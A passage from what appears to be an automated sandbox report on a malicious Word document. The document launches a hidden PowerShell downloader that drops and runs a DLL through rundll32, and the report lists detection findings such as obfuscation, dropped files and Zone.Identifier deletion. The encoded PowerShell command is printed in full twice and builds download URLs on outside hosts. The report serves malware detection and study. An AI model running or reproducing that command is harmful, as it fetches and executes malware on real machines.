HkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBpACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgA
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBpACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgAJwAtAHcAaQAnACsAJwBmACcAKQArACgAJwBpAC0AcQAnACsAJwB6AHYAdgAnACkAKwAoAC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBpACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgAJwAtAHcAaQAnACsAJwBmACcAKQArACgAJwBpAC0AcQAnACsAJwB6AHYAdgAnACkAKwAoAC Jump to behavior
PE file contains an invalid checksum
Source: P44G.dll.5.dr Static PE information: real checksum: 0x605d1 should be: 0x561b4
PE file contains sections with non-standard names
Source: P44G.dll.5.dr Static PE information: section name: .text4
Source: P44G.dll.5.dr Static PE information: section name: .text8
Source: P44G.dll.5.dr Static PE information: section name: .text7
Source: P44G.dll.5.dr Static PE information: section name: .text6
Source: P44G.dll.5.dr Static PE information: section name: .text5
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000100B push ss; iretd 7_2_1000100C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0014EED0 push edx; ret 7_2_0014EFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00133868 push ebp; ret 7_2_00133878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0013134B push 68244072h; iretd 7_2_00131350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001313BB push ss; iretd 7_2_001313C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001353F7 push 00000072h; retf 7_2_001353FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0013146C pushad ; iretd 7_2_0013146D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0016EED0 push edx; ret 8_2_0016EFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00153868 push ebp; ret 8_2_00153878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0015134B push 68244072h; iretd 8_2_00151350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001513BB push ss; iretd 8_2_001513C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001553F7 push 00000072h; retf 8_2_001553FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0015146C pushad ; iretd 8_2_0015146D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018EED0 push edx; ret 9_2_0018EFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00173868 push ebp; ret 9_2_00173878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017134B push 68244072h; iretd 9_2_00171350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001713BB push ss; iretd 9_2_001713C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001753F7 push 00000072h; retf 9_2_001753FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017146C pushad ; iretd 9_2_0017146D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001AEED0 push edx; ret 10_2_001AEFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00193868 push ebp; ret 10_2_00193878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0019134B push 68244072h; iretd 10_2_00191350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001913BB push ss; iretd 10_2_001913C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001953F7 push 00000072h; retf 10_2_001953FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0019146C pushad ; iretd 10_2_0019146D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CEED0 push edx; ret 11_2_001CEFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B3868 push ebp; ret 11_2_001B3878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B134B push 68244072h; iretd 11_2_001B1350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B13BB push ss; iretd 11_2_001B13C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B53F7 push 00000072h; retf 11_2_001B53FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B146C pushad ; iretd 11_2_001B146D

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
